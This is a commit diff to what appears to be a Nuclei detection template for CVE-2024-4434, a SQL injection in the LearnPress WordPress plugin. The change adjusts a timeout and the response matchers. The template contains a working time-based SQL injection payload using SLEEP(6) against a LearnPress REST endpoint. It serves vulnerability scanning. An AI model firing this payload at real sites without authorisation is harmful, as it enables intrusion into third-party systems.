minor update

http/cves/2024/CVE-2024-4434.yaml

@@ -22,6 +22,7 @@ info:
     max-request: 1
     publicwww-query: "/wp-content/plugins/learnpress"
   tags: cve,cve2024,wp,wp-plugin,wordpress,sqli,learnpress
+
 variables:
   num: "{{rand_int(10000, 99999)}}"
 
@@ -32,7 +33,7 @@ http:
         Host: {{Hostname}}
 
       - |
-        @timeout 30sn
+        @timeout 20s
         POST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1
         Host: {{Hostname}}
         X-WP-Nonce: {{nonce}}
@@ -42,7 +43,8 @@ http:
       - type: dsl
         dsl:
           - 'duration_2 >= 6'
-          - 'contains(body_2,"status":"success")'
+          - 'contains_all(body_2,"status","success")'
+          - 'contains(content_type,"application/json")'
           - 'status_code_2 == 200'
         condition: and